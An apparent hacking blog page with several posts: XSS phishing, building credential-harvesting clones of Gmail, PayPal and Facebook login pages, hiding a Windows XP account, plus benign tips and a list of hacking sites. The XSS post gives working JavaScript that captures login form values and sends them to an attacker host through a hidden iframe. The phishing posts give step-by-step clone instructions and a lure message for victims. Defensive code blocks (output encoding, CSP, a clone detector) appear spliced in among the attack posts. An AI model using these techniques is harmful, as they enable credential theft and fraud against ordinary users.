Wednesday, 26 March 2014

XSS Phishing (Make Phishing Your Passion)

Hi there,
There has been constant reporting of phishing, so I tried to put together a cool hack for you guys.
These hacks are becoming more and more famous day by day,
the vulnerabilities are growing and so are the hackers' activities,
but we will first start with XSS.

XSS is certainly changing the way that phishing attacks are perpetrated.

For example, we have a target such as:
http://Thewebsite.com/google/add.php?request=

Suppose there is a login form and an XSS vulnerability in the
same page.
In order to perpetrate the phishing attack, one needs to inject JavaScript code into the
variable so that the victim’s browser loads a JavaScript file.
From a brief analysis of the HTML that the site generates, I know that:
• The value that the variable “request” receives is not sanitized at all.

• The login form is named “login_clientes”.

• The login form has two input fields for user data: “user” and “pass”.

So I will use the following JavaScript code:

loginForm = document.forms['login_clientes'];       
function parseData()        
{        
var username = loginForm.user.value;        
var password = loginForm.pass.value;        
saveData(username,password);        
return true;        
}        
function saveData(username,password)        
{        
var frame=document.createElement('iframe');        
frame.src="http://myhost/myparsefile.php?username=" + username + "&password=" +       
password;        
frame.style.display='none';        
document.body.appendChild(frame);        
}        
loginForm.onsubmit = parseData;

Idea !


So, if the victim browses a page like this (don’t forget to encode the injected part):
http://Thewebsite.com/google/add.php?request=<script type="text/javascript" language="JavaScript" 
src="http://yourhost/yourJavaScriptfile.js"></script> 
A victim will give you his personal data, as long as he clicks the Submit button. 
The ideas that you must have in mind are:


• If you can make the user's browser load your JavaScript file or code when visiting
some site, you can change that site's behavior.

• If some site has forms and XSS vulnerabilities, you can try to get the data the
user inputs.

• If the user trusts the site, the user will probably give his personal data
anywhere on that site.

And what if the site has vulnerabilities on some page where it doesn’t have forms, and has
some form(s) on other page(s)?

Conclusion



Try coding some JavaScript that opens, in a full-sized frame, the page that has the login
form. If you can reach the form inside that frame via JavaScript, the job is done; otherwise,
store a copy of the HTML that the login page outputs and, instead of loading the real login
page in a frame, load your copy, which you control. As the address bar won’t change,
the user's trust in the site probably won’t change either.

What more can you do with XSS vulnerabilities?

 
• In forums or other types of community sites you can “spread the word”:
If you can send a private message, and you know that the browser of the user
that reads it will parse your JavaScript, you can make a specially crafted
message that, when read, shows the victim the page with the login form
and, without the victim knowing, sends a copy of itself to other people. Your personal
worm.


• As above but, instead of sending a private message, you can try to change the user
profile data and fill it with more injections.


• “Misplaced” JavaScript code is more likely to be parsed by Internet Explorer
than by Mozilla Firefox. Both Internet Explorer versions 6.x and 7.x parse
JavaScript code written in a “.txt” file, which can be useful in a real-world
situation like making a post in some forum that lets you attach “.txt” files, a
more likely situation than one where you can attach an “.html” file. Internet
Explorer version 6.x parses JavaScript code given as the “src” of some image.
Example: <img src=”javascript:your_code”>
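From the site owner's side, the whole attack above depends on the “request” value being reflected unencoded and on the browser being allowed to load script and frames from another host. The following is an added example, not code from the original post: `renderAddPage` is a hypothetical stand-in for add.php, and the sample value and header set are constructed for illustration.

```javascript
// Added defensive example; not code from the original post.
// Constructed value with the same shape as the injection shown in the post.
const SAMPLE_REQUEST =
  '<script type="text/javascript" src="http://yourhost/yourJavaScriptfile.js"></script>';

const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

// Encode untrusted text for an HTML element body or a quoted attribute value.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Hypothetical stand-in for add.php: reflects "request" next to the login form.
function renderAddPage(request) {
  return [
    '<!doctype html>',
    '<p>Request: ' + escapeHtml(request) + '</p>',
    '<form name="login_clientes" method="post" action="/login">',
    '  <input name="user"> <input name="pass" type="password">',
    '</form>',
  ].join('\n');
}

// Second layer in case some other output path misses the encoding step.
function buildCsp() {
  return [
    "default-src 'self'",
    "script-src 'self'",   // no inline script, no script files from other hosts
    "frame-src 'self'",    // no frames pointing at other hosts
    "form-action 'self'",  // forms may only submit to this origin
    "base-uri 'none'",
  ].join('; ');
}

function responseHeaders() {
  return {
    'Content-Type': 'text/html; charset=utf-8',
    'Content-Security-Policy': buildCsp(),
    // Tells browsers that honour it not to sniff text/plain uploads as HTML or script.
    'X-Content-Type-Options': 'nosniff',
  };
}
```

With the value encoded, the injected tag is rendered as text, and the policy keeps an external script file, a frame to another host and a cross-origin form post from being honoured by a CSP-aware browser.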


Happy Hacking 

How To Create Your Own Phisher

A phisher page is a login page that looks the same as that of the service your victim is using, for example Gmail, Orkut, Yahoo Mail, PayPal, Facebook, Twitter, etc.
It will look just the same as when you are asked to log in to your email account; that's where the victim gets tricked, aka HACKED.

So, let's start.
To create your own phisher you have to follow these simple steps:

1. You have to go to the website for which you want to make your phisher, for example Gmail, Yahoo Mail, Orkut, PayPal, etc.


2. When you are there at the login page, just click on File>Save As
[ remember to rename it as index.html while saving the web page ]


3. When you have saved the web page, open the index.html in Notepad.

4. Search for .gif and replace the text written before the image name with


You have to do that for all the images named there, or you can use the Replace All option.

5. There will be another file needed, named login.php, which will give the condition to save the username and password typed by the user.

[NOTE: I will not be providing the login.php to you; you have to get the login.php by yourself.
If you have some knowledge of the PHP language you can make your own login.php.
For those who don't have knowledge of the PHP language, I recommend you search for login.php on Google; you will surely get that file.]

6. After you have done this, click on Edit>Search and type action in the search box, and then click on Search.

7. It will take you to the first action string; after the equals mark, type login.php in place of the text written after it.

8. Click on Search again; this time it will take you to another action string. After the equals mark, type
in place of the text written in front of
the equals mark.
NOTE: You have to type your site's name in place of your-site, and your free webhosting service in place of yourservice, in
http://www.your-site.yourservice.com/login.php.

9. Now you are all done.

NOTE: You have to upload all the files to your free webhosting service directory, including the index_files folder, or it won't work.
The Directory Will be ---
i. index.html
ii. index_files [Folder which you saved]
iii. login.php
iv. login.txt 

10. You can make any website's phisher by these steps, for example Gmail, Orkut, Yahoo Mail, PayPal, Facebook, Twitter, etc.
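The steps above leave recognisable traces in the resulting page: it is served from a host that is not the brand's, its images and styles point into a browser-generated `index_files/` folder, and its password form posts to a different endpoint than the real service. The following added example (not code from the original post) checks a fetched page for those traces; the sample HTML, the `mail.example` brand host and the finding labels are constructed for illustration, and the regex-based tag matching is a simplification of real HTML parsing.

```javascript
// Added defensive example; not code from the original post.
// Constructed sample: a saved copy of a login page edited as in the steps above.
const SAMPLE_CLONE = `
<html><head><link rel="stylesheet" href="index_files/style.css"></head>
<body><img src="index_files/logo.gif">
<form method="post" action="login.php">
  <input name="Email"><input type="password" name="Passwd">
</form></body></html>`;

// Read one attribute from a tag's attribute text (quoted or bare value).
function attr(attrs, name) {
  const re = new RegExp('(?:^|\\s)' + name + '\\s*=\\s*(?:"([^"]*)"|\'([^\']*)\'|([^\\s>]+))', 'i');
  const m = re.exec(attrs);
  return m ? (m[1] ?? m[2] ?? m[3]) : null;
}

// Findings for a page fetched from pageUrl that presents itself as brandHost.
function auditLoginPage(html, pageUrl, brandHost) {
  const findings = [];
  const onBrand = (h) => h === brandHost || h.endsWith('.' + brandHost);
  const servedFrom = new URL(pageUrl).hostname;
  if (!onBrand(servedFrom)) findings.push('served-off-brand:' + servedFrom);
  // Browser "Save As" rewrites resources into a local "<name>_files/" folder.
  if (/\b(?:src|href)\s*=\s*["']?[^"'\s>]*_files\//i.test(html)) {
    findings.push('save-as-resource-folder');
  }
  const formRe = /<form\b([^>]*)>([\s\S]*?)<\/form>/gi;
  let m;
  while ((m = formRe.exec(html)) !== null) {
    // Only forms that collect a password are of interest here.
    if (!/<input\b[^>]*type\s*=\s*["']?password/i.test(m[2])) continue;
    const target = new URL(attr(m[1], 'action') || '', pageUrl);
    if (!onBrand(target.hostname)) findings.push('password-form-posts-to:' + target.hostname);
    if (target.protocol !== 'https:') findings.push('password-form-not-https');
  }
  return findings;
}
```

Calling `auditLoginPage(SAMPLE_CLONE, 'http://www.your-site.yourservice.com/', 'mail.example')` returns all four findings, while a password form served from and posting to an HTTPS host under the brand domain returns an empty list.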

Happy Hacking 

How To Hack Any Email Account (WORKING)

So let's start with some basics.
This has become a very common way to hack any email account. It is also known as a phishing attack in the language of the hackers.

Yes, this is the very famous phishing attack. This is the most concerning security threat prevailing in society,
as the targets of this kind of attack are social people.


There are two types of phishing attack:

1. Normal Phishing.
2. Desktop Phishing.

The basic idea behind the phishing attack is to fool the victim by redirecting him to a website that looks the same as the original site, while saving his password;
he thinks he is logging in to his account and gets hacked.




OK, so the basics must be clear now. LET'S START.

To hack any email ID you just have to follow these simple steps:


1. First, you have to create your website or have an account on any free webhosting service which has PHP enabled.

[For most newbies, I would recommend registering for a free webhosting service such as www.110mb.com or any free webhosting service
that comes with PHP enabled. But 110mb is best because of the user-friendly service they provide.]



2. After you have set up your account on a free webhosting service, you have to upload your phisher to the file directory of your site.


3. For that you have to make your own phishing page, which is discussed on this webpage -

Click Here To view how to make your own phisher


[The phisher page will be a login page that looks the same as that of the email service your victim is using, for example Gmail, Orkut, Yahoo Mail, PayPal, etc.
It will look just the same as when you are asked to log in to your email account; that's where the victim gets tricked, aka
HACKED.]

4. There will be another file needed, named "login.php", which will give the condition to save the username and password typed by the user.

[NOTE: I will not be providing the login.php to you; you have to get the login.php by yourself.
If you have some knowledge of the PHP language you can make your own login.php.
For those who don't have knowledge of the PHP language, I recommend you search for
login.php on Google; you will surely get that file.]



5. So, after you have created your phisher, it is time to edit it so that it saves the username and password typed by the victim.

Here are the simple steps to edit the phisher:


i. Open your phisher in a web browser, right-click somewhere in the middle of the page and then click on View Source.


ii. A new window will pop up; click on Edit>Search and type action in the search box, and then click on Search.


iii. It will take you to the first action string; after the equals mark, type login.php in place of the text written after it.


iv. Click on Search again; this time it will take you to another action string. After the equals mark, type http://www.your-site.yourservice.com/login.php in place of the text written in front of the equals mark.


NOTE: You have to type your site's name in place of your-site, and your free webhosting service in place of yourservice, in the http://www.your-site.yourservice.com/login.php written in step iv.

6. So, now that you have done the difficult part, it is time for some HACKING.

NOTE: You have to upload all the files to your free webhosting service directory, including the index_files folder, or it won't work.
The Directory Will be :-


i. index.html
ii. index_files [Folder which you saved]
iii. login.php
iv. login.txt




7. Now you have to just send the victim to your phisher site http://www.your-site.yourservice.com/ 



You can send him the message to visit your phisher for example :-

Hi,
How is it going.
You know what, i visited a site yesterday it is a new look of [Victims Email Service].
just check out.
its http://www.your-site.yourservice.com/
Its really good.
bye.
You can make your own message and send it to victim. 


9. To view the saved password you just have to log on to your free webhosting service account and open login.txt.


10. And you are done. In just ten steps you have learned the phishing attack.


I will be discussing desktop phishing in some other articles.


Happy Hacking
Greetz to all...
 

How To Manage Multiple Gmail Accounts In ur FireFox Browser

Do you love Gmail? I don't know about you guys, but I am a big fan of Google products. When I am online I need more than one email account for my ease, and it's really helpful because I don't have to worry about my accounts' security.
I know what you guys would say: “it's pretty hard to remember my accounts' usernames and passwords”.

But then again, I use multiple accounts and I remember each and everything.
That's not the case with you guys, and that's why I have written this blog article.
Now I introduce you to my tool, which helps me a lot to run various email accounts together.

Well, there are many tools on the internet.
Let's start:

Gmail Manager 0.5.7.5

The original Gmail Notifier for multiple accounts.
Allows you to receive new mail notifications along with viewing account details including unread messages, saved drafts, spam messages, labels with new mail, space used, and new mail snippets.

Further Reference

1. You can also find more Firefox add-ons for managing multiple Gmail accounts HERE
2. If you use multiple Google products, then use this Firefox add-on HERE

How To Create A Invisible Account In Windows XP

OK, a really quick tutorial for Windows XP on how to create an invisible account. What we do in this hack is really simple: just create a DWORD value in the Windows registry and hack the Windows user accounts.


OK, so if you are sure you want to learn this hack, then read ahead.

Steps :-


1. Open the Start menu, then click on Run.
2. Type Regedit in the Run window.
3. The Windows Registry Editor will open; then navigate in the left panel to:

HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
4. Create a new DWORD, setting its name to the name of the account you wish to hide.
5. Then set its value to to hide it.
6. Enjoy, it's hidden!!

NOTE: This account isn't completely hidden, because it is visible to administrators in Local Users and Groups, and the profile is also visible in Documents and Settings.

Now, how to log in to it after you have hidden the account:


1. You are at the Welcome screen and want to log in to this account.
2. Press Ctrl+Alt+Delete twice and it will display the log-on prompt.
3. Type the username and the password and hit Enter.


enjoy...


Windows 7 God Mode Hack [Tutorial]

Windows 7, the new shiny product from Microsoft, has just been revealed, and some Windows guys have uncovered a new hack in Windows 7 which the team at Windows calls "GodMode".

The hack is some kind of glitch, like the glitch we saw in YouTube yesterday. What it does is bring you to a new settings page which has some good options in it to play with Windows.

These are obviously not the Control Panel settings; they contain some good ones, like "Back up Your computer" and "Login Credentials" and stuff like that.

The "GodMode" contains a list of over 50 sections of settings, which can be enabled by a simple rename. But it might be a new promotion by the Windows guys to promote their new Windows 7...

Whatever, let's focus on the trick that we are going to apply to enable the so-called "GodMode" in Windows 7.

Steps

The hack is a very easy one; with a simple rename you can access it. So don't blame me if this is lame.
  1. Create a new folder.
  2. Rename the folder to
    GodMode.{ED7BA470-8E54-465E-825C-99712043E01C}
    (note that you can change the “GodMode” text, but the following period and code number are essential).
  3. The folder icon will change; double-click it to show the GodMode window.


Conclusion

This might be good for you, as you can now apply various settings to your Windows 7 in a single place. By the way, I don't use Windows 7 that much; I just love Windows XP. It might be a new promotional method by the Microsoft guys. Well, who cares.

- Enjoy


Top Ten Hacking Sites

Hi,
As I said, I am back with more stuff for you guys.
Hope you all enjoy it.
So I am here to tell you guys the world's top 10 websites for hackers,
which every hacker should know about.
So let's start,



1. Milw0rm

I have given this website the first rank because it is the major place for all
security guys and penetration testers, and the majority of us hackers.


2. Hack a day
Second comes this.
It's great for hackers to have a community like this,
with competitions and stuff.

3. Security Focus
These guys are great in terms of security testing,

4.ASTALAVISTA - security & hacking community
Another great place, like top-ranked milw0rm…

5.PacketStorm Security
Name tells it all :)

6.Black Hat

7.Metasploit Project

8.Insecure.org: Top 75 Security tools

9.2600 Store

The Birth Of hacking Is here …..

10.Rootkit

Hope you get that.
These were the places you must visit.
Happy Hacking